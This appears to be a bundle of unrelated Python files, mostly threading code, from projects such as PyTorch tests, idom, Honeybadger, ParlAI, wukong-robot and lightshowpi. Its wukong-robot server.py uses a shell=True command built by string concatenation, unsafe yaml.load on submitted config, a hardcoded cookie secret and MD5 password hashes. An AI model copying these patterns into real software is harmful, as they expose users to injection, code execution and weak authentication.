with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0, 1], timeout=timedelta(seconds=1))
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0], timeout=timedelta(seconds=1))
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout_new_group_non_member(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
if self.rank == 1:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0, 1], timeout=timedelta(seconds=1))
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0], timeout=timedelta(seconds=1))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_barrier_device_ids(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
c10d.barrier(device_ids=[self.rank])
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_barrier_device_ids_function_argument(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
with self.assertRaisesRegex(RuntimeError, "Invalid function argument"):
c10d.barrier(device_ids=self.rank)
if __name__ == "__main__":
assert (
not torch.cuda._initialized
), "test_distributed must not have initialized CUDA context on main process"
run_tests()
|
utils.py
|
import asyncio
import socket
import time
from contextlib import closing
from functools import wraps
from importlib import import_module
from pathlib import Path
from threading import Event, Thread
from typing import Any, Callable, List, Optional
from typing_extensions import ParamSpec
import idom
from .proto import ServerFactory
CLIENT_BUILD_DIR = Path(idom.__file__).parent / "client"
_SUPPORTED_PACKAGES = [
"sanic",
"fastapi",
"flask",
"tornado",
"starlette",
]
_FuncParams = ParamSpec("_FuncParams")
def threaded(function: Callable[_FuncParams, None]) -> Callable[_FuncParams, Thread]:
@wraps(function)
def wrapper(*args: Any, **kwargs: Any) -> Thread:
def target() -> None:
asyncio.set_event_loop(asyncio.new_event_loop())
function(*args, **kwargs)
thread = Thread(target=target, daemon=True)
thread.start()
return thread
return wrapper
def wait_on_event(description: str, event: Event, timeout: Optional[float]) -> None:
if not event.wait(timeout):
raise TimeoutError(f"Did not {description} within {timeout} seconds")
def poll(
description: str,
frequency: float,
timeout: Optional[float],
function: Callable[[], bool],
) -> None:
if timeout is not None:
expiry = time.time() + timeout
while not function():
if time.time() > expiry:
raise TimeoutError(f"Did not {description} within {timeout} seconds")
time.sleep(frequency)
else:
while not function():
time.sleep(frequency)
def find_builtin_server_type(type_name: str) -> ServerFactory[Any, Any]:
"""Find first installed server implementation
Raises:
:class:`RuntimeError` if one cannot be found
"""
installed_builtins: List[str] = []
for name in _SUPPORTED_PACKAGES:
try:
import_module(name)
except ImportError: # pragma: no cover
continue
else:
builtin_module = import_module(f"idom.server.{name}")
installed_builtins.append(builtin_module.__name__)
try:
return getattr(builtin_module, type_name) # type: ignore
except AttributeError: # pragma: no cover
pass
else: # pragma: no cover
if not installed_builtins:
raise RuntimeError(
f"Found none of the following builtin server implementations {_SUPPORTED_PACKAGES}"
)
else:
raise ImportError(
f"No server type {type_name!r} found in installed implementations {installed_builtins}"
)
def find_available_port(
host: str,
port_min: int = 8000,
port_max: int = 9000,
allow_reuse_waiting_ports: bool = True,
) -> int:
"""Get a port that's available for the given host and port range"""
for port in range(port_min, port_max):
with closing(socket.socket()) as sock:
try:
if allow_reuse_waiting_ports:
# As per this answer: https://stackoverflow.com/a/19247688/3159288
# setting can be somewhat unreliable because we allow the use of
# ports that are stuck in TIME_WAIT. However, not setting the option
# means we're overly cautious and almost always use a different addr
# even if it could have actually been used.
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((host, port))
except OSError:
pass
else:
return port
raise RuntimeError(
f"Host {host!r} has no available port in range {port_max}-{port_max}"
)
|
connection.py
|
import logging
import json
import threading
from six.moves.urllib import request
from six import b
from .utils import StringReprJSONEncoder
logger = logging.getLogger(__name__)
def send_notice(config, payload):
request_object = request.Request(url="{}/v1/notices/".format(config.endpoint),
data=b(json.dumps(payload, cls=StringReprJSONEncoder)))
if not config.api_key:
logger.error("Honeybadger API key missing from configuration: cannot report errors.")
return
request_object.add_header('X-Api-Key', config.api_key)
request_object.add_header('Content-Type', 'application/json')
request_object.add_header('Accept', 'application/json')
def send_request():
response = request.urlopen(request_object)
status = response.getcode()
if status != 201:
logger.error("Received error response [{}] from Honeybadger API.".format(status))
if config.force_sync:
send_request()
else:
t = threading.Thread(target=send_request)
t.start()
|
僵尸进程处理.py
|
"""
僵尸进程演示
"""
from multiprocessing import Process
from time import sleep
import os
from signal import *
signal(SIGCHLD, SIG_IGN) # 断绝父子关系
def fun():
print("开始第一个任务", os.getpid())
sleep(1)
print("任务结束了")
# 每一次start之前都会清理之前已经出现的僵尸
p1 = Process(target=fun)
p1.start()
sleep(3)
p2 = Process(target=fun)
p2.start()
# 同时start多个子进程,不回收,会产生多个僵尸进程
p1 = Process(target=fun)
p2 = Process(target=fun)
p1.start()
p2.start()
# Linux操作系统下产生僵尸进程的原因 Windows 下不会产生
# 在子进程死亡的时候,操作系统会发送一个signal去告知父进程,若父进程不处理(没有join)就会产生僵尸进程
# 所以也可以用signal去断绝父子关系,操作系统就不会告知父进程,而是自己回收。
# 孤儿进程是操作系统会自己回收
|
managed_window.py
|
from pyglet.window import Window
from pyglet.clock import Clock
from threading import Thread, Lock
gl_lock = Lock()
class ManagedWindow(Window):
"""
A pyglet window with an event loop which executes automatically
in a separate thread. Behavior is added by creating a subclass
which overrides setup, update, and/or draw.
"""
fps_limit = 30
default_win_args = dict(width=600,
height=500,
vsync=False,
resizable=True)
def __init__(self, **win_args):
"""
It is best not to override this function in the child
class, unless you need to take additional arguments.
Do any OpenGL initialization calls in setup().
"""
# check if this is run from the doctester
if win_args.get('runfromdoctester', False):
return
self.win_args = dict(self.default_win_args, **win_args)
self.Thread = Thread(target=self.__event_loop__)
self.Thread.start()
def __event_loop__(self, **win_args):
"""
The event loop thread function. Do not override or call
directly (it is called by __init__).
"""
gl_lock.acquire()
try:
try:
super().__init__(**self.win_args)
self.switch_to()
self.setup()
except Exception as e:
print("Window initialization failed: %s" % (str(e)))
self.has_exit = True
finally:
gl_lock.release()
clock = Clock()
clock.fps_limit = self.fps_limit
while not self.has_exit:
dt = clock.tick()
gl_lock.acquire()
try:
try:
self.switch_to()
self.dispatch_events()
self.clear()
self.update(dt)
self.draw()
self.flip()
except Exception as e:
print("Uncaught exception in event loop: %s" % str(e))
self.has_exit = True
finally:
gl_lock.release()
super().close()
def close(self):
"""
Closes the window.
"""
self.has_exit = True
def setup(self):
"""
Called once before the event loop begins.
Override this method in a child class. This
is the best place to put things like OpenGL
initialization calls.
"""
pass
def update(self, dt):
"""
Called before draw during each iteration of
the event loop. dt is the elapsed time in
seconds since the last update. OpenGL rendering
calls are best put in draw() rather than here.
"""
pass
def draw(self):
"""
Called after update during each iteration of
the event loop. Put OpenGL rendering calls
here.
"""
pass
if __name__ == '__main__':
ManagedWindow()
|
app.py
|
import numpy as np
import cv2
from PIL import Image, ImageTk
import keyboard
import pytesseract
import re
import pyWinhook
import threading
from time import sleep, perf_counter
import math
import tkinter as tk
import mss
digit_regex = r'\d+'
offset = 0.05 # km/h to go above (or below if negative) the speed limit
step = 2 # must match the "Cruise control grid step" setting
# 1080p
# current_speed_box = (1490, 710, 1525, 730)
# speed_limit_box = (1500, 780, 1525, 805)
# 1440p
current_speed_box = (1985, 945, 2050, 975)
speed_limit_box = (2000, 1040, 2033, 1075)
key_accel = 'w'
key_brake = 's'
key_cruise = 'c'
key_cruise_up = 'h'
key_cruise_dwn = 'n'
should_execute = False
running = True
current_speed = 0
speed_limit = 0
braking = False
accelerating = False
current_cruise = 0
minimum_cruise = 30 # km/h, minimum speed at which cruise can be enabled
maximum_cruise = 90 # km/h, maximum speed at which cruise can go up to
log_file = open('log.csv', 'w')
log_file.write('Speed, Limit, Cruise, Enabled, Accel, Brake\n')
# UI elements
dirty_ui = False
latest_speed_img = None
latest_limit_img = None
window = tk.Tk()
enabled_lbl = tk.Label(text=f'Enabled: {should_execute}')
cur_speed_lbl = tk.Label(text=f'Current: {current_speed}')
speed_limit_lbl = tk.Label(text=f'Limit: {speed_limit}')
cur_cruise_lbl = tk.Label(text=f'Cruise: {current_cruise}')
accel_lbl = tk.Label(text=f'Accelerating: {accelerating}')
braking_lbl = tk.Label(text=f'Braking: {braking}')
speed_img_lbl = tk.Label()
limit_img_lbl = tk.Label()
# /UI elements
def determine_commands(current, limit, cruise_active, cruise):
accelerate = (current < minimum_cruise)
brake = False #(current > (limit + 5))
# print(f'Accel: {accelerate} Brake: {brake}')
working_offset = offset if offset >= 1 else math.ceil(offset*limit) # either use the offset as-is, or if a fraction then use it as a % of the limit
working_limit = min(limit + working_offset, maximum_cruise)
increase_cruise = cruise_active and cruise < working_limit
decrease_cruise = cruise_active and (cruise - step) >= working_limit
activate_cruise = not cruise_active and current >= minimum_cruise
return accelerate, brake, activate_cruise, increase_cruise, decrease_cruise
def execute_commands(accel, brake, enCruise, upCruise, dwnCruise):
global current_cruise
if accel: keyboard.press(key_accel)
if brake: keyboard.press(key_brake)
if enCruise:
keyboard.press_and_release(key_cruise)
current_cruise = current_speed
if upCruise:
keyboard.press_and_release(key_cruise_up)
current_cruise += step
if dwnCruise:
keyboard.press_and_release(key_cruise_dwn)
current_cruise -= step
if not accel: keyboard.release(key_accel)
if not brake: keyboard.release(key_brake)
def OnKeyboardEvent(event):
# print('MessageName:',event.MessageName)
# print('Message:',event.Message)
# print('Time:',event.Time)
# print('Window:',event.Window)
# print('WindowName:',event.WindowName)
# print('Ascii:', event.Ascii, chr(event.Ascii))
# print('Key:', event.Key)
# print('KeyID:', event.KeyID)
# print('ScanCode:', event.ScanCode)
# print('Extended:', event.Extended)
# print('Injected:', event.Injected)
# print('Alt', event.Alt)
# print('Transition', event.Transition)
# print('---')
if (event.WindowName == 'Euro Truck Simulator 2' and event.Key == 'Z'):
#print('Key:', event.Key)
global should_execute
global dirty_ui
global current_cruise
dirty_ui = True
should_execute = not should_execute
if not should_execute: current_cruise = 0
execute_commands(False, False, False, False, False)
# return True to pass the event to other handlers
return True
# def pump_thread():
# pythoncom.PumpMessages()
def cv_img_to_tk(src):
img = cv2.cvtColor(src, cv2.COLOR_BGR2RGB)
img = Image.fromarray(img)
return ImageTk.PhotoImage(img)
def extract_current_speed():
cur_raw = sct.grab(current_speed_box)
cur_speed_img = np.array(cur_raw)
cur_speed_img = cv2.cvtColor(cur_speed_img, cv2.COLOR_RGB2GRAY)
cur_speed_img = cv2.threshold(cur_speed_img, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]
# t_grab_speed = perf_counter()-start_timer
speed = -1
try:
current_ocr = pytesseract.image_to_string(cur_speed_img, config='--psm 7 --oem 3 -c tessedit_char_whitelist=0123456789')
speed = int(re.match(digit_regex, current_ocr)[0])
except:
pass
return speed, cur_speed_img
# t_calc_speed = perf_counter()-start_timer
def extract_current_limit():
limit_raw = sct.grab(speed_limit_box)
speed_limit_img = np.array(limit_raw)
speed_limit_img = cv2.cvtColor(speed_limit_img, cv2.COLOR_RGB2GRAY)
speed_limit_img = cv2.threshold(speed_limit_img, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]
latest_limit_img = speed_limit_img
# t_grab_limit = perf_counter()-start_timer
limit = -1
try:
limit_ocr = pytesseract.image_to_string(speed_limit_img, config='--psm 8 --oem 3 -c tessedit_char_whitelist=0123456789')
limit = int(re.match(digit_regex, limit_ocr)[0])
except:
pass
return limit, speed_limit_img
def current_speed_thread():
global current_speed
global latest_speed_img
global dirty_ui
while running:
prev_speed = current_speed
(speed, latest_speed_img) = extract_current_speed()
if speed > 100 or speed < 0: speed = prev_speed # safety
current_speed = speed
if speed != prev_speed: dirty_ui = True
def speed_limit_thread():
global speed_limit
global latest_limit_img
global dirty_ui
while running:
prev_limit = speed_limit
(limit, latest_limit_img) = extract_current_limit()
if limit > 100 or limit < 1: limit = prev_limit
speed_limit = limit
if limit != prev_limit: dirty_ui = True
def work_thread():
global braking
global accelerating
global dirty_ui
global current_cruise
sleep_time = 1 / 30 # 30 ops per second, ideally
counter = 5
counter_timer = perf_counter()
limit_count = 5
while running:
start_timer = perf_counter()
counter += 1
was_accel = accelerating
was_brake = braking
was_cruise = current_cruise > 0
(accelerating, braking, enCruise, upCruise, dwnCruise) = determine_commands(current_speed, speed_limit, was_cruise, current_cruise)
# t_determine = perf_counter()-start_timer
if should_execute:
execute_commands(accelerating, braking, enCruise, upCruise, dwnCruise)
# t_execute = perf_counter()-start_timer
if was_accel != accelerating or was_brake != braking: dirty_ui = True
if dirty_ui:
en = 1 if should_execute else 0
ac = 1 if accelerating else 0
br = 1 if braking else 0
log_file.write(f'{current_speed}, {speed_limit}, {current_cruise}, {en}, {ac}, {br}\n') # only need to log any changes
# t_log = perf_counter()-start_timer
end_timer = perf_counter()-start_timer
if counter >= limit_count: # only check limit infrequently
lps = limit_count / (perf_counter() - counter_timer)
counter_timer = perf_counter()
# print(f'LPS: {lps}')
counter = 0
#print(f'Loop time: {end_timer}\ngs:{start_timer} cs:{t_calc_speed-start_timer} gl:{t_grab_limit-t_calc_speed} cl:{t_calc_limit-t_grab_limit} det:{t_determine-t_calc_limit} ex:{t_execute-t_determine} log:{t_log-t_execute}')
# print(f'Loop time: {end_timer}')
# cv2.waitKey(50)
sleep(sleep_time)
print(pytesseract.get_tesseract_version())
# create a hook manager
hm = pyWinhook.HookManager()
# watch for all keyboard events
hm.KeyDown = OnKeyboardEvent
# set the hook
hm.HookKeyboard()
sct = mss.mss()
#create a thread to process images/send commands
t_speed = threading.Thread(target=current_speed_thread)
t_speed.start()
t_limit = threading.Thread(target=speed_limit_thread)
t_limit.start()
t_worker = threading.Thread(target=work_thread)
t_worker.start()
enabled_lbl.pack()
cur_speed_lbl.pack()
speed_limit_lbl.pack()
cur_cruise_lbl.pack()
accel_lbl.pack()
braking_lbl.pack()
speed_img_lbl.pack()
limit_img_lbl.pack()
window.attributes('-topmost', True)
window.update()
# window.mainloop()
try:
while running:
# update UI
if dirty_ui:
enabled_lbl.configure(text=f'Enabled: {should_execute}')
cur_speed_lbl.configure(text=f'Current: {current_speed}')
speed_limit_lbl.configure(text=f'Limit: {speed_limit}')
cur_cruise_lbl.configure(text=f'Cruise: {current_cruise}')
accel_lbl.configure(text=f'Accelerating: {accelerating}')
braking_lbl.configure(text=f'Braking: {braking}')
if latest_speed_img is not None:
copy = cv_img_to_tk(latest_speed_img)
speed_img_lbl.configure(image=copy)
speed_img_lbl.image = copy
latest_speed_img = None
if latest_limit_img is not None:
copy_l = cv_img_to_tk(latest_limit_img)
limit_img_lbl.configure(image=copy_l)
limit_img_lbl.image = copy_l
latest_limit_img = None
window.update_idletasks()
window.update()
sleep(1/30)
except:
running = False
log_file.close()
raise
#pythoncom.PumpMessages() # wait forever, passing keypresses along
#cv2.destroyAllWindows()
#TODO: Some sort of filtering to throw out random values that make no sense (91, random drops to single digits)
# Option for % offset rather than absolute (ie 5% is 4km/h at 80, 2 at 40, etc)
# UI options to change offset on the fly, other configuration
|
client.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import json
import uuid
import websocket
import time
import threading
from parlai.core.params import ParlaiParser
def _get_rand_id():
"""
:return: The string of a random id using uuid4
"""
return str(uuid.uuid4())
def _prBlueBG(text):
"""
Print given in text with a blue background.
:param text: The text to be printed
"""
print("\033[44m{}\033[0m".format(text), sep="")
def on_message(ws, message):
"""
Prints the incoming message from the server.
:param ws: a WebSocketApp
:param message: json with 'text' field to be printed
"""
incoming_message = json.loads(message)
print("\033[0m\n")
print("Bot: " + incoming_message['text'])
quick_replies = incoming_message.get('quick_replies')
if quick_replies is not None and len(quick_replies) > 0:
print(f"\nOptions: [{'|'.join(quick_replies)}]")
print("\033[44m\n")
def on_error(ws, error):
"""
Prints an error, if occurs.
:param ws: WebSocketApp
:param error: An error
"""
print(error)
def on_close(ws):
"""
Cleanup before closing connection.
:param ws: WebSocketApp
"""
# Reset color formatting if necessary
print("\033[0m")
print("Connection closed")
def _run(ws, id):
"""
Takes user input and sends it to a websocket.
:param ws: websocket.WebSocketApp
"""
while True:
x = input("\033[44m Me: ")
print("\033[0m", end="")
data = {}
data['id'] = id
data['text'] = x
json_data = json.dumps(data)
ws.send(json_data)
time.sleep(1)
if x == "[DONE]":
break
ws.close()
def on_open(ws):
"""
Starts a new thread that loops, taking user input and sending it to the websocket.
:param ws: websocket.WebSocketApp that sends messages to a terminal_manager
"""
id = _get_rand_id()
threading.Thread(target=_run, args=(ws, id)).start()
def setup_args():
"""
Set up args, specifically for the port number.
:return: A parser that parses the port from commandline arguments.
"""
parser = ParlaiParser(False, False)
parser_grp = parser.add_argument_group('Terminal Chat')
parser_grp.add_argument(
'--port', default=35496, type=int, help='Port to run the terminal chat server'
)
return parser.parse_args()
if __name__ == "__main__":
opt = setup_args()
port = opt.get('port', 34596)
print("Connecting to port: ", port)
ws = websocket.WebSocketApp(
"ws://localhost:{}/websocket".format(port),
on_message=on_message,
on_error=on_error,
on_close=on_close,
)
ws.on_open = on_open
ws.run_forever()
|
server.py
|
import json
from robot import config, utils, logging, constants, Updater
import base64
import requests
import tornado.web
import tornado.ioloop
from tornado import gen
import tornado.httpserver
import tornado.options
import hashlib
import threading
import asyncio
import subprocess
import os
import time
import yaml
import markdown
import random
logger = logging.getLogger(__name__)
conversation, wukong = None, None
suggestions = [
'现在几点',
'你吃饭了吗',
'上海的天气',
'写一首关于大海的诗',
'来玩成语接龙',
'我有多少邮件',
'你叫什么名字',
'讲个笑话'
]
class BaseHandler(tornado.web.RequestHandler):
def isValidated(self):
return self.get_cookie("validation") == config.get('/server/validate', '')
def validate(self, validation):
return validation == config.get('/server/validate', '')
class MainHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
global conversation, wukong, suggestions
if not self.isValidated():
self.redirect("/login")
return
if conversation:
info = Updater.fetch()
suggestion = random.choice(suggestions)
notices = None
if 'notices' in info:
notices=info['notices']
self.render('index.html', history=conversation.getHistory(), update_info=info, suggestion=suggestion, notices=notices)
else:
self.render('index.html', history=[])
class ChatHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def post(self):
global conversation
if self.validate(self.get_argument('validate')):
if self.get_argument('type') == 'text':
query = self.get_argument('query')
uuid = self.get_argument('uuid')
conversation.doResponse(query, uuid)
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
elif self.get_argument('type') == 'voice':
voice_data = self.get_argument('voice')
tmpfile = utils.write_temp_file(base64.b64decode(voice_data), '.wav')
fname, suffix = os.path.splitext(tmpfile)
nfile = fname + '-16k' + suffix
# downsampling
soxCall = 'sox ' + tmpfile + \
' ' + nfile + ' rate 16k'
subprocess.call([soxCall], shell=True, close_fds=True)
utils.check_and_delete(tmpfile)
conversation.doConverse(nfile)
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal type'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class GetHistoryHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
global conversation
if not self.validate(self.get_argument('validate')):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
res = {'code': 0, 'message': 'ok', 'history': json.dumps(conversation.getHistory())}
self.write(json.dumps(res))
self.finish()
class GetConfigHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.validate(self.get_argument('validate')):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
key = self.get_argument("key", default="")
res = ''
if key == '':
res = {'code': 0, 'message': 'ok', 'config': config.getText(), 'sensitivity': config.get('sensitivity', 0.5)}
else:
res = {'code': 0, 'message': 'ok', 'value': config.get(key)}
self.write(json.dumps(res))
self.finish()
class GetLogHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.validate(self.get_argument('validate')):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
lines = self.get_argument('lines', default=200)
res = {'code': 0, 'message': 'ok', 'log': logging.readLog(lines)}
self.write(json.dumps(res))
self.finish()
class LogHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
self.render("log.html")
class OperateHandler(BaseHandler):
def post(self):
global wukong
if self.validate(self.get_argument('validate')):
if self.get_argument('type') == 'restart':
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
self.finish()
time.sleep(3)
wukong.restart()
else:
res = {'code': 1, 'message': 'illegal type'}
self.write(json.dumps(res))
self.finish()
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class ConfigHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
self.render('config.html', sensitivity=config.get('sensitivity'))
def post(self):
global conversation
if self.validate(self.get_argument('validate')):
configStr = self.get_argument('config')
try:
yaml.load(configStr)
config.dump(configStr)
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
except:
res = {'code': 1, 'message': 'YAML解析失败,请检查内容'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class DonateHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.isValidated():
self.redirect("/login")
return
r = requests.get('https://raw.githubusercontent.com/wzpan/wukong-contrib/master/docs/donate.md')
content = markdown.markdown(r.text, extensions=['codehilite',
'tables',
'fenced_code',
'meta',
'nl2br',
'toc'
])
self.render('donate.html', content=content)
class APIHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
content = ''
with open(os.path.join(constants.TEMPLATE_PATH, "api.md"), 'r') as f:
content = f.read()
content = markdown.markdown(content, extensions=['codehilite',
'tables',
'fenced_code',
'meta',
'nl2br',
'toc'
])
self.render('api.html', content=content)
class UpdateHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def post(self):
global wukong
if self.validate(self.get_argument('validate')):
if wukong.update():
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
self.finish()
time.sleep(3)
wukong.restart()
else:
res = {'code': 1, 'message': '更新失败,请手动更新'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class LoginHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if self.isValidated():
self.redirect('/')
else:
self.render('login.html', error=None)
@tornado.web.asynchronous
@gen.coroutine
def post(self):
if self.get_argument('username') == config.get('/server/username') and \
hashlib.md5(self.get_argument('password').encode('utf-8')).hexdigest() \
== config.get('/server/validate'):
self.set_cookie("validation", config.get('/server/validate'))
self.redirect("/")
else:
self.render('login.html', error="登录失败")
class LogoutHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if self.isValidated():
self.set_cookie("validation", '')
self.redirect("/login")
settings = {
"cookie_secret" : b'*\xc4bZv0\xd7\xf9\xb2\x8e\xff\xbcL\x1c\xfa\xfeh\xe1\xb8\xdb\xd1y_\x1a',
"template_path": "server/templates",
"static_path": "server/static",
"debug": False
}
application = tornado.web.Application([
(r"/", MainHandler),
(r"/login", LoginHandler),
(r"/gethistory", GetHistoryHandler),
(r"/chat", ChatHandler),
(r"/config", ConfigHandler),
(r"/getconfig", GetConfigHandler),
(r"/operate", OperateHandler),
(r"/getlog", GetLogHandler),
(r"/log", LogHandler),
(r"/logout", LogoutHandler),
(r"/api", APIHandler),
(r"/upgrade", UpdateHandler),
(r"/donate", DonateHandler)
], **settings)
def start_server(con, wk):
global conversation, wukong
conversation = con
wukong = wk
if config.get('/server/enable', False):
port = config.get('/server/port', '5000')
try:
asyncio.set_event_loop(asyncio.new_event_loop())
application.listen(int(port))
tornado.ioloop.IOLoop.instance().start()
except Exception as e:
logger.critical('服务器启动失败: {}'.format(e))
def run(conversation, wukong):
t = threading.Thread(target=lambda: start_server(conversation, wukong))
t.start()
|
default_models.py
|
import urllib.request
from pathlib import Path
from threading import Thread
from tqdm import tqdm
default_models = {
"encoder": ("https://drive.google.com/uc?export=download&id=1q8mEGwCkFy23KZsinbuvdKAQLqNKbYf1", 17090379),
# Too large to put on google drive with a direct link...
"synthesizer": ("https://www.dropbox.com/s/r37koa6ho5prz7w/synthesizer.pt?dl=1", 370554559),
"vocoder": ("https://drive.google.com/uc?export=download&id=1cf2NO6FtI0jDuy8AV3Xgn6leO6dHjIgu", 53845290),
}
class DownloadProgressBar(tqdm):
def update_to(self, b=1, bsize=1, tsize=None):
if tsize is not None:
self.total = tsize
self.update(b * bsize - self.n)
def download(url: str, target: Path, bar_pos=0):
# Ensure the directory exists
target.parent.mkdir(exist_ok=True, parents=True)
desc = f"Downloading {target.name}"
with DownloadProgressBar(unit="B", unit_scale=True, miniters=1, desc=desc, position=bar_pos, leave=False) as t:
urllib.request.urlretrieve(url, filename=target, reporthook=t.update_to)
def ensure_default_models(models_dir: Path):
# Define download tasks
jobs = []
for model_name, (url, size) in default_models.items():
target_path = models_dir / "default" / f"{model_name}.pt"
if target_path.exists():
if target_path.stat().st_size != size:
print(f"File {target_path} is not of expected size, redownloading...")
else:
continue
thread = Thread(target=download, args=(url, target_path, len(jobs)))
thread.start()
jobs.append((thread, target_path, size))
# Run and join threads
for thread, target_path, size in jobs:
thread.join()
assert target_path.stat().st_size == size, \
f"Download for {target_path.name} failed. You may download models manually instead. Open an issue if the " \
f"problem is recurrent.\nhttps://drive.google.com/drive/folders/1fU6umc5uQAVR2udZdHX-lDgXYzTyqG_j"
|
synchronized_lights.py
|
#!/usr/bin/env python
#
# Licensed under the BSD license. See full license in LICENSE file.
# http://www.lightshowpi.org/
#
# Author: Todd Giles (todd@lightshowpi.org)
# Author: Chris Usey (chris.usey@gmail.com)
# Author: Ryan Jennings
# Author: Paul Dunn (dunnsept@gmail.com)
# Author: Tom Enos (tomslick.ca@gmail.com)
"""Play any audio file and synchronize lights to the music
When executed, this script will play an audio file, as well as turn on
and off N channels of lights to the music (by default the first 8 GPIO
channels on the Raspberry Pi), based upon music it is playing. Many
types of audio files are supported (see decoder.py below), but it has
only been tested with wav and mp3 at the time of this writing.
The timing of the lights turning on and off is based upon the frequency
response of the music being played. A short segment of the music is
analyzed via FFT to get the frequency response across each defined
channel in the audio range. Each light channel is then faded in and
out based upon the amplitude of the frequency response in the
corresponding audio channel. Fading is accomplished with a software
PWM output. Each channel can also be configured to simply turn on and
off as the frequency response in the corresponding channel crosses a
threshold.
FFT calculation can be CPU intensive and in some cases can adversely
affect playback of songs (especially if attempting to decode the song
as well, as is the case for an mp3). For this reason, the FFT
calculations are cached after the first time a new song is played.
The values are cached in a gzipped text file in the same location as the
song itself. Subsequent requests to play the same song will use the
cached information and not recompute the FFT, thus reducing CPU
utilization dramatically and allowing for clear music playback of all
audio file types.
Recent optimizations have improved this dramatically and most users are
no longer reporting adverse playback of songs even on the first
playback.
Sample usage:
To play an entire list -
sudo python synchronized_lights.py --playlist=/home/pi/music/.playlist
To play a specific song -
sudo python synchronized_lights.py --file=/home/pi/music/jingle_bells.mp3
Third party dependencies:
alsaaudio: for audio input/output
http://pyalsaaudio.sourceforge.net/
decoder.py: decoding mp3, ogg, wma, ...
https://pypi.python.org/pypi/decoder.py/1.5XB
numpy: for FFT calculation
http://www.numpy.org/
"""
import ConfigParser
import argparse
import atexit
import audioop
from collections import deque
import cPickle
import errno
import json
import logging as log
import os
import random
import subprocess
import signal
import stat
import sys
import time
import wave
import curses
import bright_curses
import mutagen
from Queue import Queue, Empty
from threading import Thread
import alsaaudio as aa
import decoder
import numpy as np
from numpy import where, clip, round, nan_to_num
import Platform
import fft
from prepostshow import PrePostShow
import RunningStats
# Make sure SYNCHRONIZED_LIGHTS_HOME environment variable is set
HOME_DIR = os.getenv("SYNCHRONIZED_LIGHTS_HOME")
if not HOME_DIR:
print("Need to setup SYNCHRONIZED_LIGHTS_HOME environment variable, see readme")
sys.exit()
LOG_DIR = HOME_DIR + '/logs'
# logging levels
levels = {'DEBUG': log.DEBUG,
'INFO': log.INFO,
'WARNING': log.WARNING,
'ERROR': log.ERROR,
'CRITICAL': log.CRITICAL}
# Arguments
parser = argparse.ArgumentParser()
parser.add_argument('--log', default='INFO',
help='Set the logging level. levels:INFO, DEBUG, WARNING, ERROR, CRITICAL')
file_group = parser.add_mutually_exclusive_group()
file_group.add_argument('--playlist', default="playlist_path",
help='Playlist to choose song from.')
file_group.add_argument('--file', help='path to the song to play (required if no '
'playlist is designated)')
cache_group = parser.add_mutually_exclusive_group()
cache_group.add_argument('--readcache', type=bool, default=True,
help='read light timing from cache if available. Default: true')
cache_group.add_argument('--createcache', action="store_true",
help='create light timing cache without audio playback or lightshow.')
if parser.parse_args().createcache:
parser.set_defaults(readcache=False)
# Setup log file
log.basicConfig(filename=LOG_DIR + '/music_and_lights.play.dbg',
format='[%(asctime)s] %(levelname)s {%(pathname)s:%(lineno)d} - %(message)s',
level=log.INFO)
level = levels.get(parser.parse_args().log.upper())
log.getLogger().setLevel(level)
# import hardware_controller
import hardware_controller
